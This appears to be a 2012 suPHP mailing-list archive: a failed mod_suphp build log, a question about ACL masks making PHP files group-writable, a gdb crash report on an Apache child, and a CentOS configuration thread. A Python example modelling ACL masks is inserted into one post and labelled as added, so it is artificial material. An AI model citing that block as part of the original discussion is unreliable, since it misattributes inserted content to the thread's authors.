checking for ranlib... ranlib
checking for strip... strip
checking if gcc supports -fno-rtti -fno-exceptions... no
checking for gcc option to produce PIC... -fPIC
checking if gcc PIC flag -fPIC works... yes
checking if gcc static flag -static works... yes
checking if gcc supports -c -o file.o... yes
checking whether the gcc linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
configure: creating libtool
appending configuration tag "CXX" to libtool
checking for ld used by g++... /usr/bin/ld -m elf_x86_64
checking if the linker (/usr/bin/ld -m elf_x86_64) is GNU ld... yes
checking whether the g++ linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking for g++ option to produce PIC... -fPIC
checking if g++ PIC flag -fPIC works... yes
checking if g++ static flag -static works... yes
checking if g++ supports -c -o file.o... yes
checking whether the g++ linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking dynamic linker characteristics... GNU/Linux ld.so
(cached) (cached) checking how to hardcode library paths into programs... immediate
appending configuration tag "F77" to libtool
checking for ANSI C header files... (cached) yes
checking fcntl.h usability... yes
checking fcntl.h presence... yes
checking for fcntl.h... yes
checking for stdlib.h... (cached) yes
checking for string.h... (cached) yes
checking for unistd.h... (cached) yes
checking for APR... yes
checking for dynamic Apache module support (via APXS)... found at /lamp/apache/bin/apxs (version 2.4.3)
checking for set-UID/set-GID mode... ok - using paranoid
configure: creating ./config.status
config.status: creating Makefile
config.status: creating src/Makefile
config.status: creating src/apache/Makefile
config.status: creating src/apache2/Makefile
config.status: creating src/config.h
config.status: executing depfiles commands





[root@mr suphp-0.7.1]# make
Making all in src
make[1]: Entering directory `/root/suphp-0.7.1/src'
make  all-recursive
make[2]: Entering directory `/root/suphp-0.7.1/src'
Making all in apache
make[3]: Entering directory `/root/suphp-0.7.1/src/apache'
/bin/sh ../../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../../src    -I/lamp/apache/include -DSUPHP_PATH_TO_SUPHP=\"/lamp/suphp/sbin/suphp\" -DSUPHP_USE_USERGROUP -g -O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c -o mod_suphp.lo mod_suphp.c
mkdir .libs
 gcc -DHAVE_CONFIG_H -I. -I../../src -I/lamp/apache/include -DSUPHP_PATH_TO_SUPHP=\"/lamp/suphp/sbin/suphp\" -DSUPHP_USE_USERGROUP -g -O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c mod_suphp.c  -fPIC -DPIC -o .libs/mod_suphp.o
mod_suphp.c:47: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘suphp_module’
mod_suphp.c:59: error: expected specifier-qualifier-list before ‘table’
mod_suphp.c:66: error: expected ‘)’ before ‘*’ token
mod_suphp.c:84: error: expected ‘)’ before ‘*’ token
mod_suphp.c:125: error: expected ‘)’ before ‘*’ token
mod_suphp.c:145: error: expected ‘)’ before ‘*’ token
mod_suphp.c: In function ‘suphp_handle_cmd_engine’:
mod_suphp.c:191: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:191: error: (Each undeclared identifier is reported only once
mod_suphp.c:191: error: for each function it appears in.)
mod_suphp.c: In function ‘suphp_handle_cmd_config’:
mod_suphp.c:207: warning: assignment makes pointer from integer without a cast
mod_suphp.c: In function ‘suphp_handle_cmd_user_group’:
mod_suphp.c:222: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:224: warning: assignment makes pointer from integer without a cast
mod_suphp.c:225: warning: assignment makes pointer from integer without a cast
mod_suphp.c: In function ‘suphp_handle_cmd_add_handler’:
mod_suphp.c:238: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:241: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c: In function ‘suphp_handle_cmd_remove_handler’:
mod_suphp.c:253: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:256: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c: In function ‘suphp_handle_cmd_phppath’:
mod_suphp.c:266: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:268: error: ‘suphp_conf’ has no member named ‘php_path’
mod_suphp.c: At top level:
mod_suphp.c:277: warning: initialization from incompatible pointer type
mod_suphp.c:279: warning: initialization from incompatible pointer type
mod_suphp.c:282: warning: initialization from incompatible pointer type
mod_suphp.c:285: warning: initialization from incompatible pointer type
mod_suphp.c:287: warning: initialization from incompatible pointer type
mod_suphp.c:289: warning: initialization from incompatible pointer type
mod_suphp.c:296: error: expected declaration specifiers or ‘...’ before ‘child_info’
mod_suphp.c: In function ‘suphp_source_child’:
mod_suphp.c:299: error: ‘pool’ undeclared (first use in this function)
mod_suphp.c:299: error: ‘p’ undeclared (first use in this function)
mod_suphp.c:302: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:309: warning: assignment makes pointer from integer without a cast
mod_suphp.c:310: error: ‘suphp_conf’ has no member named ‘php_path’
mod_suphp.c:310: warning: assignment makes pointer from integer without a cast
mod_suphp.c:312: warning: assignment makes pointer from integer without a cast
mod_suphp.c:325: error: ‘suphp_conf’ has no member named ‘php_path’
mod_suphp.c:329: error: ‘suphp_conf’ has no member named ‘php_path’
mod_suphp.c:329: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:329: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c: At top level:
mod_suphp.c:336: error: expected declaration specifiers or ‘...’ before ‘child_info’
mod_suphp.c: In function ‘suphp_child’:
mod_suphp.c:339: error: ‘pool’ undeclared (first use in this function)
mod_suphp.c:339: error: ‘p’ undeclared (first use in this function)
mod_suphp.c:351: warning: assignment makes pointer from integer without a cast
mod_suphp.c:368: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:368: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c:368: error: too few arguments to function ‘ap_log_error_’
mod_suphp.c:376: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:376: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c:376: error: too few arguments to function ‘ap_log_error_’
mod_suphp.c:384: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:384: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c:384: error: too few arguments to function ‘ap_log_error_’
mod_suphp.c:392: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:392: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c:392: error: too few arguments to function ‘ap_log_error_’
mod_suphp.c:412: warning: passing argument 5 of ‘ap_log_error_’ makes integer from pointer without a cast
mod_suphp.c:412: warning: passing argument 6 of ‘ap_log_error_’ from incompatible pointer type
mod_suphp.c: In function ‘suphp_source_handler’:
mod_suphp.c:424: error: ‘pool’ undeclared (first use in this function)
mod_suphp.c:424: error: ‘p’ undeclared (first use in this function)
mod_suphp.c:426: error: ‘BUFF’ undeclared (first use in this function)
mod_suphp.c:426: error: ‘script_in’ undeclared (first use in this function)
mod_suphp.c:426: error: ‘script_out’ undeclared (first use in this function)
mod_suphp.c:426: error: ‘script_err’ undeclared (first use in this function)
mod_suphp.c:433: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:434: error: ‘suphp_conf’ has no member named ‘php_path’
mod_suphp.c:445: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:445: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:449: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:449: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:453: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:453: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:459: error: ‘kill_after_timeout’ undeclared (first use in this function)
mod_suphp.c:462: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:462: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c: In function ‘suphp_handler’:
mod_suphp.c:514: error: storage size of ‘finfo’ isn’t known
mod_suphp.c:521: error: ‘pool’ undeclared (first use in this function)
mod_suphp.c:521: error: ‘p’ undeclared (first use in this function)
mod_suphp.c:523: error: ‘BUFF’ undeclared (first use in this function)
mod_suphp.c:523: error: ‘script_in’ undeclared (first use in this function)
mod_suphp.c:523: error: ‘script_out’ undeclared (first use in this function)
mod_suphp.c:523: error: ‘script_err’ undeclared (first use in this function)
mod_suphp.c:527: error: ‘suphp_module’ undeclared (first use in this function)
mod_suphp.c:539: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c:539: warning: comparison between pointer and integer
mod_suphp.c:540: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c:540: warning: comparison between pointer and integer
mod_suphp.c:541: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c:541: error: invalid type argument of ‘unary *’
mod_suphp.c:544: error: ‘suphp_conf’ has no member named ‘handlers’
mod_suphp.c:544: error: invalid type argument of ‘unary *’
mod_suphp.c:563: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:563: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:567: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:567: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:571: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:571: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:587: warning: initialization makes pointer from integer without a cast
mod_suphp.c:596: warning: assignment makes pointer from integer without a cast
mod_suphp.c:597: error: dereferencing pointer to incomplete type
mod_suphp.c:599: warning: assignment makes pointer from integer without a cast
mod_suphp.c:600: error: dereferencing pointer to incomplete type
mod_suphp.c:602: warning: assignment makes pointer from integer without a cast
mod_suphp.c:620: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:620: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:620: error: too few arguments to function ‘ap_log_rerror_’
mod_suphp.c:649: warning: assignment makes pointer from integer without a cast
mod_suphp.c:658: warning: assignment makes pointer from integer without a cast
mod_suphp.c:659: warning: assignment makes pointer from integer without a cast
mod_suphp.c:690: error: ‘kill_after_timeout’ undeclared (first use in this function)
mod_suphp.c:693: warning: passing argument 5 of ‘ap_log_rerror_’ makes integer from pointer without a cast
mod_suphp.c:693: warning: passing argument 6 of ‘ap_log_rerror_’ from incompatible pointer type
mod_suphp.c:742: warning: assignment makes pointer from integer without a cast
mod_suphp.c:755: warning: assignment makes pointer from integer without a cast
mod_suphp.c:768: error: ‘REDIRECT’ undeclared (first use in this function)
mod_suphp.c: At top level:
mod_suphp.c:789: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘suphp_handlers’
mod_suphp.c:798: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘suphp_module’
make[3]: *** [mod_suphp.lo] Error 1
make[3]: Leaving directory `/root/suphp-0.7.1/src/apache'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/root/suphp-0.7.1/src'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/root/suphp-0.7.1/src'
make: *** [all-recursive] Error 1



--
Regards
Jaseem

Daniel Ahern | 23 Sep 2012 19:18

660 permissions; need a system where multiple users are able to modify a php file

Hi,

I've got a little problem.

We're using a Linux webserver with SuPHP, and I need multi-user support 
so that several programmers may have access to different files.

My intention was to use ACLs, but setfacl for user:programmer2:6 sets 
the mask to 6 (this is necessary, because the mask sets the highest 
level of permissions for users defined by ACLs) which also causes the 
group permission to be set to 6.  Of course, a file with 660 permissions 
will not be executed by SuPHP.

Is there any way around this or is it simply that SuPHP cannot be used 
if you need a system where multiple users are able to modify a php file?

Thanks,
Daniel
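
The interaction described in this message, as an added example that is not part of the original post and is not suPHP code: a small model of how a POSIX ACL maps onto the permission bits that stat() reports, and of a mode-bit check that refuses group-writable scripts. All function names are hypothetical, the ACLs are constructed sample values, and the mask recalculation follows the default behaviour of `setfacl -m`.

```python
import stat

TAGS = {"u": "user", "g": "group", "m": "mask", "o": "other"}


def parse_perm(text):
    """'rw-' or an octal digit such as '6' -> integer 0..7."""
    if text.isdigit():
        return int(text, 8)
    return sum({"r": 4, "w": 2, "x": 1}[c] for c in text if c != "-")


def parse_acl(text):
    """Parse the short text form, e.g. 'user::rw-,group::r--,other::---'.

    Returns {(tag, qualifier): perm}; the qualifier is '' for the owner,
    owning group, mask and other entries.
    """
    acl = {}
    for entry in text.split(","):
        tag, qualifier, perm = entry.strip().split(":")
        acl[(TAGS.get(tag, tag), qualifier)] = parse_perm(perm)
    return acl


def setfacl_modify(acl, entries):
    """Model `setfacl -m ENTRIES` on a copy of the ACL.

    Unless a mask entry is given explicitly, the mask is recalculated as the
    union of the owning group and every named user and named group entry.
    """
    changes = parse_acl(entries)
    new = {**acl, **changes}
    if ("mask", "") not in changes:
        mask = 0
        for (tag, qualifier), perm in new.items():
            if tag == "group" or (tag == "user" and qualifier):
                mask |= perm
        new[("mask", "")] = mask
    return new


def mode_bits(acl):
    """Permission bits stat() reports: the group triplet shows the mask
    when one exists, not the owning group's own entry."""
    group_class = acl.get(("mask", ""), acl[("group", "")])
    return acl[("user", "")] << 6 | group_class << 3 | acl[("other", "")]


def effective(acl, tag, qualifier):
    """Effective rights of a named or group entry: its bits ANDed with the mask."""
    return acl[(tag, qualifier)] & acl.get(("mask", ""), 7)


def passes_mode_check(mode):
    """Mode-only test of the kind the post describes: refuse a script whose
    mode has the group or other write bit set. It cannot see ACL entries."""
    return not mode & (stat.S_IWGRP | stat.S_IWOTH)


if __name__ == "__main__":
    base = parse_acl("user::rw-,group::r--,other::---")   # constructed 0640 script
    shared = setfacl_modify(base, "user:programmer2:6")   # the command from the post
    capped = setfacl_modify(shared, "mask::r--")          # force the mask back down
    for name, acl in (("base", base), ("shared", shared), ("capped", capped)):
        mode = mode_bits(acl)
        line = f"{name:7} mode={mode:04o} passes_check={passes_mode_check(mode)}"
        if ("user", "programmer2") in acl:
            line += f" programmer2_effective={effective(acl, 'user', 'programmer2')}"
        print(line)
```

The owning group's own entry stays `r--` throughout; only the mask changes, and lowering the mask to satisfy the mode check also removes programmer2's effective write access.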
Sylvain Rochet | 19 Aug 2012 17:24

mod suPHP crash while processing script output

Hi,

One of my hosted managed to crash Apache children with a script running 
through suPHP. Note that the script is not meant to be executed as CGI; 
this is a regular script inside an abandoned directory index which is 
run by mistake by web crawlers because the httpd runs .sh scripts as 
CGI by default.

This is fully reproducible and I can give the script which makes it 
crash to anyone wanting to look deeper into this issue. There is nothing 
important in this script, but I am not sure if disclosing the script here 
now is a very good idea.

The latest apache2 error log line is:

[Sun Aug 19 15:05:18 2012] [error] [client 127.0.0.1] malformed header from script. Bad header=#: hidden-script-name.sh

Which makes sense, because this is not a CGI script. Note that the script 
is still running perfectly after the Apache child crashed.

It looks like suPHP is trying to free() an uninitialised pointer; here 
is the trace dump:

(gdb) run -f /usr/local/apache2/conf/httpd.conf -X
Starting program: /usr/local/apache2/bin/httpd -f /usr/local/apache2/conf/httpd.conf -X
[Thread debugging using libthread_db enabled]
httpd: apr_sockaddr_info_get() failed for ornithopter
httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName

Program received signal SIGSEGV, Segmentation fault.
0xf7f95ad5 in apr_bucket_free () from /usr/lib/libaprutil-1.so.0
(gdb) bt full
#0  0xf7f95ad5 in apr_bucket_free () from /usr/lib/libaprutil-1.so.0
No symbol table info available.
#1  0xf7fdba6d in suphp_read_fd (b=0xffeaddb8, str=0xffffb15c, len=0xffffb158,
block=APR_BLOCK_READ) at mod_suphp.c:458
No locals.
#2  suphp_bucket_read (b=0xffeaddb8, str=0xffffb15c, len=0xffffb158, block=APR_BLOCK_READ) at mod_suphp.c:493
        results = 0x81a66e0
        num = 1
        data = 0x81a6678
        timeout = 300000000
        rv = 14
        gotdata = 0
#3  0xf7fda5ab in suphp_discard_output (bb=<value optimized out>) at mod_suphp.c:533
        b = 0xffeaddb8
        buf = 0x0
        len = 0
        rv = <value optimized out>
#4  0xf7fdb6a4 in suphp_script_handler (r=<value optimized out>) at mod_suphp.c:1049
        ret = <value optimized out>
        location = <value optimized out>
        p = 0x819db80
        sconf = 0x81a6608
        dconf = 0x81a65e8
        finfo = {pool = 0x819db80, valid = 7598960, protection = 1365, filetype = APR_REG, user = 15718, group =
18078, inode = 11499806, device = 64768, nlink = 1, size = 56888, csize = 57344, atime = 1345387388760185,
mtime = 1190240767000000, ctime = 1345388715883782, 
          fname = 0x819f940 "/hidden/script/name", name = 0x8146b7b "lication/x-httpd-bash", filehand = 0x1}
        procattr = 0x81a6320
        argv = 0xffffd244
        env = 0x81a6608
        rv = 500
        strbuf = "#\000atus\000 500\000\000
text/html\000\067+squeeze14\000ÂÏ\n\bxk\024\b<÷\f\b\000\000\000\000\001\200­û\033³ÿÿ\033³ÿÿ\033³ÿÿ\033³ÿÿ2³ÿÿÿÿÿÿ\033³ÿÿÿÿÿÿ",
'\000' <repeats 48 times>, "\206§½÷\020Øø÷\000\000\000\000ÿÿÿÿôÏÿ÷ÿÿÿÿ\001\000\000\000Ȳÿÿféþ÷pÉ\024\bØË\024\b\001\000\000\000лÿÿ\000\002\000\000\035\000\000\000\000\000\000\000\035\000\000\000\220°ÿÿ\000\000\000\000\000\004\000\000\000\000\000\000p°ÿÿлÿÿû\002Î\003\003\000\000\000ôO"...
        tmpbuf = <value optimized out>
        auth_user = <value optimized out>
        auth_pass = <value optimized out>
        ud_user = 0x0
        ud_group = 0x0
        bb = 0x81a6608
        b = <value optimized out>
#5  0xf7fdbe00 in suphp_handler (r=0x819dbc0) at mod_suphp.c:569
        dconf = 0x819f488
#6  0x0807ff6b in ap_run_handler ()
No symbol table info available.
#7  0x08080696 in ap_invoke_handler ()
No symbol table info available.
#8  0x0809e032 in ap_process_request ()
No symbol table info available.
#9  0x0809b0ad in ap_process_http_connection ()
No symbol table info available.
#10 0x08088037 in ap_run_process_connection ()
No symbol table info available.
#11 0x0808844b in ap_process_connection ()
No symbol table info available.
#12 0x080b62af in child_main ()
No symbol table info available.
#13 0x080b639d in make_child ()
No symbol table info available.
#14 0x080b6938 in ap_mpm_run ()
No symbol table info available.
#15 0x08069f40 in main ()
No symbol table info available.
(gdb) 

Best regards,
Sylvain
Joe Gillotti | 11 Jul 2012 08:53

Re: suPHP not working centos 6.2

You currently have mod_php and suPHP enabled in apache.

Either delete or move out of the way conf.d/php.conf as that is what is 
including mod_php

You can see it for yourself in the phpinfo() snippet you pasted: "Server 
API     Apache 2.0 Handler "

Also you may need to change "AddType application/x-httpd-php .php" to 
"AddType x-httpd-php .php" in your httpd.conf so it matches what suphp 
is supposed to look for.

On 7/10/2012 1:59 PM, Shane Graham wrote:
> Server API Apache 2.0 Handler 
Shane Graham | 10 Jul 2012 19:59

suPHP not working centos 6.2

Hello,

I've been trying to get suPHP working on all my servers but I am having trouble. Every time I comment out the php_module I get about 20 errors, and I have run out of options, as I am running PHP as apache and I really do not want to do that. Attached are my config files. I removed some information like the sites on it and the directories and paths to the SSL certificates.

Some information on the server

PHP Version 5.3.3


System Linux i-585-2924-VM 2.6.32-220.13.1.el6.x86_64 #1 SMP Tue Apr 17 23:56:34 BST 2012 x86_64
Build Date May 7 2012 20:14:24
Configure Command './configure' '--build=x86_64-redhat-linux-gnu' '--host=x86_64-redhat-linux-gnu' '--target=x86_64-redhat-linux-gnu' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib64' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/var/lib' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib64' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--with-xpm-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--with-kerberos' '--enable-ucd-snmp-hack' '--enable-shmop' '--enable-calendar' '--without-sqlite' '--with-libxml-dir=/usr' '--enable-xml' '--with-system-tzdata' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable-pdo' '--disable-xmlreader' '--disable-xmlwriter' '--without-sqlite3' '--disable-phar' '--disable-fileinfo' '--disable-json' '--without-pspell' '--disable-wddx' '--without-curl' '--disable-posix' '--disable-sysvmsg' '--disable-sysvshm' '--disable-sysvsem'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /etc
Loaded Configuration File /etc/php.ini
Scan this dir for additional .ini files /etc/php.d
Additional .ini files parsed /etc/php.d/curl.ini, /etc/php.d/dom.ini, /etc/php.d/fileinfo.ini, /etc/php.d/gd.ini, /etc/php.d/json.ini, /etc/php.d/ldap.ini, /etc/php.d/mbstring.ini, /etc/php.d/mcrypt.ini, /etc/php.d/mssql.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/odbc.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_dblib.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_odbc.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/phar.ini, /etc/php.d/snmp.ini, /etc/php.d/soap.ini, /etc/php.d/sqlite3.ini, /etc/php.d/tidy.ini, /etc/php.d/wddx.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlrpc.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini, /etc/php.d/zip.ini
PHP API 20090626
PHP Extension 20090626
Zend Extension 220090626
Zend Extension Build API220090626,NTS
PHP Extension Build API20090626,NTS
Debug Build no
Thread Safety disabled
Zend Memory Manager enabled
Zend Multibyte Support disabled
IPv6 Support enabled
Registered PHP Streams https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip
Registered Stream Socket Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls
Registered Stream Filters zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, mcrypt.*, mdecrypt.*

Configuration

apache2handler

Apache Version Apache/2.2.15 (CentOS)
Apache API Version 20051115
Server Administrator root@localhost
Hostname:Port amssm.org:0
User/Group apache(48)/48
Max Requests Per Child: 4000 - Keep Alive: off - Max Per Connection: 100
Timeouts Connection: 60 - Keep-Alive: 15
Virtual Server Yes
Server Root /etc/httpd
Loaded Modules core prefork http_core mod_so mod_auth_basic mod_auth_digest mod_authn_file mod_authn_alias mod_authn_anon mod_authn_dbm mod_authn_default mod_authz_host mod_authz_user mod_authz_owner mod_authz_groupfile mod_authz_dbm mod_authz_default util_ldap mod_authnz_ldap mod_include mod_log_config mod_logio mod_env mod_ext_filter mod_mime_magic mod_expires mod_deflate mod_headers mod_usertrack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_speling mod_userdir mod_alias mod_substitute mod_rewrite mod_proxy mod_proxy_balancer mod_proxy_ftp mod_proxy_http mod_proxy_ajp mod_proxy_connect mod_cache mod_suexec mod_disk_cache mod_cgi mod_version mod_fcgid mod_php5 mod_python mod_ruby mod_ssl mod_suphp
echo exec('/usr/bin/whoami');  // echo's apache



Any help at all would be greatly appreciated.

Thank you,
Shane Graham
Computer-Geek.net
Attachment (config.zip): application/zip, 33 KiB